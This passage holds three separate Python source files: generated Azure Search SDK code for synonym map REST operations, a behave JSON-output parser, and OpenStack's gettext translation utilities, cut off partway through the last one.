_header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str')
if if_none_match is not None:
_header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_get_request(
synonym_map_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps(\'{synonymMapName}\')")
path_format_arguments = {
"synonymMapName": _SERIALIZER.url("synonym_map_name", synonym_map_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_list_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
select = kwargs.pop('select', None) # type: Optional[str]
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps")
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if select is not None:
_query_parameters['$select'] = _SERIALIZER.query("select", select, 'str')
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_create_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps")
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
if content_type is not None:
_header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
# fmt: on
class SynonymMapsOperations(object):
"""SynonymMapsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.search.documents.indexes.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def create_or_update(
self,
synonym_map_name, # type: str
synonym_map, # type: "_models.SynonymMap"
if_match=None, # type: Optional[str]
if_none_match=None, # type: Optional[str]
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.SynonymMap"
"""Creates a new synonym map or updates a synonym map if it already exists.
:param synonym_map_name: The name of the synonym map to create or update.
:type synonym_map_name: str
:param synonym_map: The definition of the synonym map to create or update.
:type synonym_map: ~azure.search.documents.indexes.models.SynonymMap
:param if_match: Defines the If-Match condition. The operation will be performed only if the
ETag on the server matches this value.
:type if_match: str
:param if_none_match: Defines the If-None-Match condition. The operation will be performed only
if the ETag on the server does not match this value.
:type if_none_match: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword prefer: For HTTP PUT requests, instructs the service to return the created/updated
resource on success. The default value is "return=representation". Note that overriding this
default value may result in unsupported behavior.
:paramtype prefer: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynonymMap, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.SynonymMap
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynonymMap"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
prefer = kwargs.pop('prefer', "return=representation") # type: str
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
_json = self._serialize.body(synonym_map, 'SynonymMap')
request = build_create_or_update_request(
synonym_map_name=synonym_map_name,
prefer=prefer,
api_version=api_version,
content_type=content_type,
json=_json,
x_ms_client_request_id=_x_ms_client_request_id,
if_match=if_match,
if_none_match=if_none_match,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
if response.status_code == 200:
deserialized = self._deserialize('SynonymMap', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('SynonymMap', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': "/synonymmaps(\'{synonymMapName}\')"} # type: ignore
@distributed_trace
def delete( # pylint: disable=inconsistent-return-statements
self,
synonym_map_name, # type: str
if_match=None, # type: Optional[str]
if_none_match=None, # type: Optional[str]
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes a synonym map.
:param synonym_map_name: The name of the synonym map to delete.
:type synonym_map_name: str
:param if_match: Defines the If-Match condition. The operation will be performed only if the
ETag on the server matches this value.
:type if_match: str
:param if_none_match: Defines the If-None-Match condition. The operation will be performed only
if the ETag on the server does not match this value.
:type if_none_match: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
request = build_delete_request(
synonym_map_name=synonym_map_name,
api_version=api_version,
x_ms_client_request_id=_x_ms_client_request_id,
if_match=if_match,
if_none_match=if_none_match,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': "/synonymmaps(\'{synonymMapName}\')"} # type: ignore
@distributed_trace
def get(
self,
synonym_map_name, # type: str
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.SynonymMap"
"""Retrieves a synonym map definition.
:param synonym_map_name: The name of the synonym map to retrieve.
:type synonym_map_name: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynonymMap, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.SynonymMap
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynonymMap"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
request = build_get_request(
synonym_map_name=synonym_map_name,
api_version=api_version,
x_ms_client_request_id=_x_ms_client_request_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SynonymMap', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/synonymmaps(\'{synonymMapName}\')"} # type: ignore
@distributed_trace
def list(
self,
select=None, # type: Optional[str]
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.ListSynonymMapsResult"
"""Lists all synonym maps available for a search service.
:param select: Selects which top-level properties of the synonym maps to retrieve. Specified as
a comma-separated list of JSON property names, or '*' for all properties. The default is all
properties.
:type select: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListSynonymMapsResult, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.ListSynonymMapsResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListSynonymMapsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
request = build_list_request(
api_version=api_version,
select=select,
x_ms_client_request_id=_x_ms_client_request_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('ListSynonymMapsResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': "/synonymmaps"} # type: ignore
@distributed_trace
def create(
self,
synonym_map, # type: "_models.SynonymMap"
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.SynonymMap"
"""Creates a new synonym map.
:param synonym_map: The definition of the synonym map to create.
:type synonym_map: ~azure.search.documents.indexes.models.SynonymMap
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynonymMap, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.SynonymMap
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynonymMap"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
_json = self._serialize.body(synonym_map, 'SynonymMap')
request = build_create_request(
api_version=api_version,
content_type=content_type,
json=_json,
x_ms_client_request_id=_x_ms_client_request_id,
template_url=self.create.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SynonymMap', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create.metadata = {'url': "/synonymmaps"} # type: ignore
|
|
# -*- coding: utf-8 -*-
"""
Read behave's JSON output files and store retrieved information in
:mod:`behave.model` elements.
Utility to retrieve runtime information from behave's JSON output.
REQUIRES: Python >= 2.6 (json module is part of Python standard library)
"""
__author__ = "Jens Engel"
# -- IMPORTS:
from behave import model
import codecs
try:
import json
except ImportError:
# -- PYTHON 2.5 backward compatible: Use simplejson module.
import simplejson as json
# ----------------------------------------------------------------------------
# FUNCTIONS:
# ----------------------------------------------------------------------------
def parse(json_filename, encoding="UTF-8"):
"""
Reads behave JSON output file back in and stores information in
behave model elements.
:param json_filename: JSON filename to process.
:return: List of feature objects.
"""
with codecs.open(json_filename, "rU", encoding=encoding) as fp:
json_data = json.load(fp, encoding=encoding)
json_processor = JsonParser()
features = json_processor.parse_features(json_data)
return features
# ----------------------------------------------------------------------------
# CLASSES:
# ----------------------------------------------------------------------------
class JsonParser(object):
def parse_features(self, json_data):
assert isinstance(json_data, list)
features = []
json_features = json_data
for json_feature in json_features:
feature = self.parse_feature(json_feature)
features.append(feature)
return features
def parse_feature(self, json_feature):
name = json_feature.get("name", u"")
keyword = json_feature.get("keyword", None)
tags = json_feature.get("tags", [])
description = json_feature.get("description", [])
location = json_feature.get("location", u"")
filename, line = location.split(":")
feature = model.Feature(filename, line, keyword, name, tags, description)
json_elements = json_feature.get("elements", [])
for json_element in json_elements:
self.add_feature_element(feature, json_element)
return feature
def add_feature_element(self, feature, json_element):
datatype = json_element.get("type", u"")
category = datatype.lower()
if category == "background":
background = self.parse_background(json_element)
feature.background = background
elif category == "scenario":
scenario = self.parse_scenario(json_element)
feature.add_scenario(scenario)
elif category == "scenario_outline":
scenario_outline = self.parse_scenario_outline(json_element)
feature.add_scenario(scenario_outline)
self.current_scenario_outline = scenario_outline
# elif category == "examples":
# examples = self.parse_examples(json_element)
# self.current_scenario_outline.examples = examples
else:
raise KeyError("Invalid feature-element keyword: %s" % category)
def parse_background(self, json_element):
"""
self.add_feature_element({
'keyword': background.keyword,
'location': background.location,
'steps': [],
})
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
location = json_element.get("location", u"")
json_steps = json_element.get("steps", [])
steps = self.parse_steps(json_steps)
filename, line = location.split(":")
background = model.Background(filename, line, keyword, name, steps)
return background
def parse_scenario(self, json_element):
"""
self.add_feature_element({
'keyword': scenario.keyword,
'name': scenario.name,
'tags': scenario.tags,
'location': scenario.location,
'steps': [],
})
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
description = json_element.get("description", [])
tags = json_element.get("tags", [])
location = json_element.get("location", u"")
json_steps = json_element.get("steps", [])
steps = self.parse_steps(json_steps)
filename, line = location.split(":")
scenario = model.Scenario(filename, line, keyword, name, tags, steps)
scenario.description = description
return scenario
def parse_scenario_outline(self, json_element):
"""
self.add_feature_element({
'keyword': scenario_outline.keyword,
'name': scenario_outline.name,
'tags': scenario_outline.tags,
'location': scenario_outline.location,
'steps': [],
'examples': [],
})
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
description = json_element.get("description", [])
tags = json_element.get("tags", [])
location = json_element.get("location", u"")
json_steps = json_element.get("steps", [])
json_examples = json_element.get("examples", [])
steps = self.parse_steps(json_steps)
examples = []
if json_examples:
examples = self.parse_examples(json_examples)
filename, line = location.split(":")
scenario_outline = model.ScenarioOutline(filename, line, keyword, name,
tags=tags, steps=steps, examples=examples)
scenario_outline.description = description
return scenario_outline
def parse_steps(self, json_steps):
steps = []
for json_step in json_steps:
step = self.parse_step(json_step)
steps.append(step)
return steps
def parse_step(self, json_element):
"""
s = {
'keyword': step.keyword,
'step_type': step.step_type,
'name': step.name,
'location': step.location,
}
if step.text:
s['text'] = step.text
if step.table:
s['table'] = self.make_table(step.table)
element = self.current_feature_element
element['steps'].append(s)
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
step_type = json_element.get("step_type", u"")
location = json_element.get("location", u"")
text = json_element.get("text", None)
if isinstance(text, list):
text = "\n".join(text)
table = None
json_table = json_element.get("table", None)
if json_table:
table = self.parse_table(json_table)
filename, line = location.split(":")
step = model.Step(filename, line, keyword, step_type, name)
step.text = text
step.table = table
json_result = json_element.get("result", None)
if json_result:
self.add_step_result(step, json_result)
return step
def add_step_result(self, step, json_result):
"""
steps = self.current_feature_element['steps']
steps[self._step_index]['result'] = {
'status': result.status,
'duration': result.duration,
}
"""
status = json_result.get("status", u"")
duration = json_result.get("duration", 0)
error_message = json_result.get("error_message", None)
if isinstance(error_message, list):
error_message = "\n".join(error_message)
step.status = status
step.duration = duration
step.error_message = error_message
def parse_table(self, json_table):
"""
table_data = {
'headings': table.headings,
'rows': [ list(row) for row in table.rows ]
}
return table_data
"""
headings = json_table.get("headings", [])
rows = json_table.get("rows", [])
table = model.Table(headings, rows=rows)
return table
def parse_examples(self, json_element):
"""
e = {
'keyword': examples.keyword,
'name': examples.name,
'location': examples.location,
}
if examples.table:
e['table'] = self.make_table(examples.table)
element = self.current_feature_element
element['examples'].append(e)
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
location = json_element.get("location", u"")
table = None
json_table = json_element.get("table", None)
if json_table:
table = self.parse_table(json_table)
filename, line = location.split(":")
examples = model.Examples(filename, line, keyword, name, table)
return examples
|
|
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
gettext for openstack-common modules.
Usual usage in an openstack.common module:
from <project_name>.openstack.common.gettextutils import _
"""
import copy
import gettext
import locale
from logging import handlers
import os
from babel import localedata
import six
_AVAILABLE_LANGUAGES = {}
# FIXME(dhellmann): Remove this when moving to oslo.i18n.
USE_LAZY = False
class TranslatorFactory(object):
"""Create translator functions
"""
def __init__(self, domain, localedir=None):
"""Establish a set of translation functions for the domain.
:param domain: Name of translation domain,
specifying a message catalog.
:type domain: str
:param lazy: Delays translation until a message is emitted.
Defaults to False.
:type lazy: Boolean
:param localedir: Directory with translation catalogs.
:type localedir: str
"""
self.domain = domain
if localedir is None:
localedir = os.environ.get(domain.upper() + '_LOCALEDIR')
self.localedir = localedir
def _make_translation_func(self, domain=None):
"""Return a new translation function ready for use.
Takes into account whether or not lazy translation is being
done.
The domain can be specified to override the default from the
factory, but the localedir from the factory is always used
because we assume the log-level translation catalogs are
installed in the same directory as the main application
catalog.
"""
if domain is None:
domain = self.domain
t = gettext.translation(domain,
localedir=self.localedir,
fallback=True)
# Use the appropriate method of the translation object based
# on the python version.
m = t.gettext if six.PY3 else t.ugettext
def f(msg):
"""oslo.i18n.gettextutils translation function."""
if USE_LAZY:
return Message(msg, domain=domain)
return m(msg)
return f
@property
def primary(self):
"The default translation function."
return self._make_translation_func()
def _make_log_translation_func(self, level):
return self._make_translation_func(self.domain + '-log-' + level)
@property
def log_info(self):
"Translate info-level log messages."
return self._make_log_translation_func('info')
@property
def log_warning(self):
"Translate warning-level log messages."
return self._make_log_translation_func('warning')
@property
def log_error(self):
"Translate error-level log messages."
return self._make_log_translation_func('error')
@property
def log_critical(self):
"Translate critical-level log messages."
return self._make_log_translation_func('critical')
# NOTE(dhellmann): When this module moves out of the incubator into
# oslo.i18n, these global variables can be moved to an integration
# module within each application.
# Create the global translation functions.
_translators = TranslatorFactory('<project_name>')
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
# NOTE(dhellmann): End of globals that will move to the application's
# integration module.
def enable_lazy():
"""Convenience function for configuring _() to use lazy gettext
Call this at the start of execution to enable the gettextutils._
function to use lazy gettext functionality. This is useful if
your project is importing _ directly instead of using the
gettextutils.install() way of importing the _ function.
"""
global USE_LAZY
USE_LAZY = True
def install(domain):
"""Install a _() function using the given translation domain.
Given a translation domain, install a _() function using gettext's
install() function.
The main difference from gettext.install() is that we allow
overriding the default localedir (e.g. /usr/share/locale) using
a translation-domain-specific environment variable (e.g.
NOVA_LOCALEDIR).
Note that to enable lazy translation, enable_lazy must be
called.
:param domain: the translation domain
"""
from six import moves
tf = TranslatorFactory(domain)
moves.builtins.__dict__['_'] = tf.primary
class Message(six.text_type):
"""A Message object is a unicode object that can be translated.
Translation of Message is done explicitly using the translate() method.
For all non-translation intents and purposes, a Message is simply unicode,
and can be treated as such.
"""
def __new__(cls, msgid, msgtext=None, params=None,
domain='<project_name>', *args):
"""Create a new Message object.
In order for translation to work gettext requires a message ID, this
msgid will be used as the base unicode text. It is also possible
for the msgid and the base unicode text to be different by passing
the msgtext parameter.
"""
# If the base msgtext is not given, we use the default translation
# of the msgid (which is in English) just in case the system locale is
# not English, so that the base text will be in that locale by default.
if not msgtext:
msgtext = Message._translate_msgid(msgid, domain)
# We want to initialize the parent unicode with the actual object that
# would have been plain unicode if 'Message' was not enabled.
msg = super(Message, cls).__new__(cls, msgtext)
msg.msgid = msgid
msg.domain = domain
msg.params = params
return msg
def translate(self, desired_locale=None):
"""Translate this message to the desired locale.
:param desired_locale: The desired locale to translate the message to,
if no locale is provided the message will be
translated to the system's default locale.
:returns: the translated message in unicode
"""
translated_message = Message._translate_msgid(self.msgid,
self.domain,
desired_locale)
if self.params is None:
# No need for more translation
return translated_message
# This Message object may have been formatted with one or more
# Message objects as substitution arguments, given either as a single
# argument, part of a tuple, or as one or more values in a dictionary.
# When translating this Message we need to translate those Messages too
translated_params = _translate_args(self.params, desired_locale)
translated_message = translated_message % translated_params
return translated_message
@staticmethod
def _translate_msgid(msgid, domain, desired_locale=None):
if not desired_locale:
system_locale = locale.getdefaultlocale()
# If the system locale is not available to the runtime use English
if not system_locale[0]:
desired_locale = 'en_US'
else:
desired_locale = system_locale[0]
locale_dir = os.environ.get(domain.upper() + '_LOCALEDIR')
lang = gettext.translation(domain,
localedir=locale_dir,
languages=[desired_locale],
fallback=True)
if six.PY3:
translator = lang.gettext
else:
translator = lang.ugettext
translated_message = translator(msgid)
return translated_message
def __mod__(self, other):
# When we mod a Message we want the actual operation to be performed
# by the parent class (i.e. unicode()), the only thing we do here is
# save the original msgid and the parameters in case of a translation
params = self._sanitize_mod_params(other)
unicode_mod = super(Message, self).__mod__(params)
modded = Message(self.msgid,
msgtext=unicode_mod,
params=params,
domain=self.domain)
return modded
def _sanitize_mod_params(self, other):
"""Sanitize the object being modded with this Message.
- Add support for modding 'None' so translation supports it
- Trim the modded object, which can be a large dictionary, to only
those keys that would actually be used in a translation
- Snapshot the object being modded, in case the message is
translated, it will be used as it was when the Message was created
"""
if other is None:
params = (other,)
elif isinstance(other, dict):
# Merge the dictionaries
# Copy each item in case one does not support deep copy.
params = {}
if isinstance(self.params, dict):
for key, val in self.params.items():
params[key] = self._copy_param(val)
for key, val in other.items():
params[key] = self._copy_param(val)
else:
params = self._copy_param(other)
return params
def _copy_param(self, param):
try:
return copy.deepcopy(param)
except Exception:
# Fallback to casting to unicode this will handle the
# python code-like objects that can't be deep-copied
return six.text_type(param)
def __add__(self, other):
msg = _('Message objects do not support addition.')
raise TypeError(msg)
def __radd__(self, other):
return self.__add__(other)
if six.PY2:
def __str__(self):
# NOTE(luisg): Logging in python 2.6 tries to str() log records,
# and it expects specifically a UnicodeError in order to proceed.
msg = _('Message objects do not support str() because they may '
'contain non-ascii characters. '
'Please use unicode() or translate() instead.')
raise UnicodeError(msg)
def get_available_languages(domain):
"""Lists the available languages for the given translation domain.
:param domain: the domain to get languages for
"""
if domain in _AVAILABLE_LANGUAGES:
return copy.copy(_AVAILABLE_LANGUAGES[domain])
localedir = '%s_LOCALEDIR' % domain.upper()
find = lambda x: gettext.find(domain,
localedir=os.environ.get(localedir),
languages=[x])
# NOTE(mrodden): en_US should always be available (and first in case
# order matters) since our in-line message strings are en_US
language_list = ['en_US']
# NOTE(luisg): Babel <1.0 used a function called list(), which was
# renamed to locale_identifiers() in >=1.0, the requirements master list
# requires >=0.9.6, uncapped, so defensively work with both. We can remove
# this check when the master list updates to >=1.0, and update all projects
list_identifiers = (getattr(localedata, 'list', None) or
getattr(localedata, 'locale_identifiers'))
locale_identifiers = list_identifiers()
for i in locale_identifiers:
if find(i) is not None:
language_list.append(i)
# NOTE(luisg): Babel>=1.0,<1.3 has a bug where some OpenStack supported
# locales (e.g. 'zh_CN', and 'zh_TW') aren't supported even though they
# are perfectly legitimate locales:
# https://github.com/mitsuhiko/babel/issues/37
# In Babel 1.3 they fixed the bug and they support these locales, but
# they are still not explicitly "listed" by locale_identifiers().
# That is why we add the locales here explicitly if necessary so that
# they are listed as supported.
aliases = {'zh': 'zh_CN',
'zh_Hant_HK': 'zh_HK',
'zh_Hant': 'zh_TW',
'fil': 'tl_PH'}
for (locale_, alias) in six.iteritems(aliases):
if locale_ in language_list and alias not in language_list:
language_list.append(alias)
_AVAILABLE_LANGUAGES[domain] = language_list
return copy.copy(language_list)
def translate(obj, desired_locale=None):
"""Gets the translated unicode representation of the given object.
If the object is not translatable it is returned as-is.
If the locale is None the object is translated to the system locale.
:param obj: the object to translate
:param desired_locale: the locale to translate the message to, if None the
default system locale will be used
:returns: the translated object in unicode, or the original object if
it could not be translated
"""
message = obj
if not isinstance(message, Message):
# If the object to translate is not already translatable,
# let's first get its unicode representation
message = six.text_type(obj)
if isinstance(message, Message):
# Even after unicoding() we still need to check if we are
# running with translatable unicode before translating
return message.translate(desired_locale)
return obj
def _translate_args(args, desired_locale=None):
"""Translates all the translatable elements of the given arguments object.
This method is used for translating the translatable values in method
arguments which include values of tuples or dictionaries.
If the object is not a tuple or a dictionary the object itself is
translated if it is translatable.
If the locale is None the object is translated to the system locale.
:param args: the args to translate
:param desired_locale: the locale to translate the args to, if None the
default system locale will be used
:returns: a new args object with the translated contents of the original
"""
if isinstance(args, tuple):
return tuple(translate(v, desired_locale) for v in args)
if isinstance(args, dict):
translated_dict = {}
for (k, v) in six.iteritems(args):
translated_v = translate(v, desired_locale)
translated_dict[k] = translated_v
return translated_dict
return translate(args, desired_locale)
class TranslationHandler(handlers.MemoryHandler):
"""Handler that translates records before logging them.
The TranslationHandler takes a locale and a target logging.Handler object
to forward LogRecord objects to after translating them. This handler
depends on Message objects being logged, instead of regular strings.
The handler can be configured declaratively in the logging.conf as follows:
[handlers]
keys = translatedlog, translator
[handler_translatedlog]
class = handlers.WatchedFileHandler
args = ('/var/log/api-localized.log',)
formatter = context
[handler_translator]
class = openstack.common.log.TranslationHandler
target = translatedlog
args = ('zh_CN',)
If the specified locale is not available in the system, the handler will
log in the default locale.
"""
def __init__(self, locale=None, target=None):
"""Initialize a TranslationHandler
:param locale: locale to use for translating messages
:param target: logging.Handler object to forward
LogRecord objects to after translation
"""
# NOTE(luisg): In order to allow this handler to be a wrapper for
# other handlers, such as a FileHandler, and still be able to
# configure it using logging.conf, this handler has to extend
# MemoryHandler because only the MemoryHandlers' logging.conf
# parsing is implemented such that it accepts a target handler.
handlers.MemoryHandler.__init__(self, capacity=0, target=target)
self.locale = locale
def setFormatter(self, fmt):
self.target.setFormatter(fmt)
def emit(self, record):
# We save the message from the original record to restore it
# after translation, so other handlers are not affected by this
original_msg = record.msg
original_args = record.args
try:
self._translate_and_log_record(record)
finally:
record.msg = original_msg
